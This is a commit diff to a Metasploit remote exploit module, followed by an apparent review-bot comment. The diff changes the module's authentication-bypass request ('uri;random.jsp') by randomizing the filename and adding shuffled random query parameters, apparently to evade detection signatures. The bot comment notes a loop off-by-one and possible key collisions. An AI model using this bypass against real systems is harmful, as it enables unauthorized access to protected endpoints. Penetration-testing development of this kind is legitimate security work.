we can shuffle the query params so the jsp param is not first. we can optionally add some characters before the trailing .jsp
parent
b7200b52e1
commit
f0ca5c10dc
|
@ -93,10 +93,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# This is the authentication bypass vulnerability, allowing any authenticated endpoint to be access unauthenticated.
|
||||
def send_auth_bypass_request_cgi(opts = {})
|
||||
opts['vars_get'] = {
|
||||
'jsp' => "#{opts['uri']};.jsp"
|
||||
# The file name of the .jsp can be 0 or more characters (it just has to end in .jsp)
|
||||
vars_get = {
|
||||
'jsp' => "#{opts['uri']};#{Rex::Text.rand_text_alphanumeric(rand(8))}.jsp"
|
||||
}
|
||||
|
||||
# Add in 0 or more random query parameters, and ensure the order is shuffled in the request.
|
||||
0.upto(rand(8)) do
|
||||
vars_get[Rex::Text.rand_text_alphanumeric(rand(1..8))] = Rex::Text.rand_text_alphanumeric(rand(1..16))
|
||||
end
|
||||
|
||||
opts['vars_get'] = {} unless opts.key? 'vars_get'
|
||||
|
||||
opts['vars_get'].merge!(vars_get)
|
||||
|
||||
opts['shuffle_get_params'] = true
|
||||
|
||||
opts['uri'] = normalize_uri(target_uri.path, Rex::Text.rand_text_alphanumeric(8))
|
||||
|
||||
send_request_cgi(opts)
|
||||
|
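Review bot: `0.upto(rand(8)) do` always runs at least once (`0.upto(0)` yields one iteration), so the loop adds 1 to 9 random parameters rather than the "0 or more" the comment directly above it promises; `rand(0..8).times do` (or `rand(9).times do`) matches the documented range and the `rand(1..8)` style already used on the next line. Each random key is drawn independently and `vars_get[...] =` overwrites, so a key that collides with an earlier random key, with `'jsp'`, or — via `merge!` — with an entry the caller already placed in `opts['vars_get']` silently replaces it; this is improbable for alphanumeric keys but, if it matters, `next if vars_get.key?(key)` after generating the key avoids it. The comment on the first added line could also state that the method now mutates the caller's `opts['vars_get']` hash in place, which the old code did not. The method's closing `end` lies outside the hunk.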
|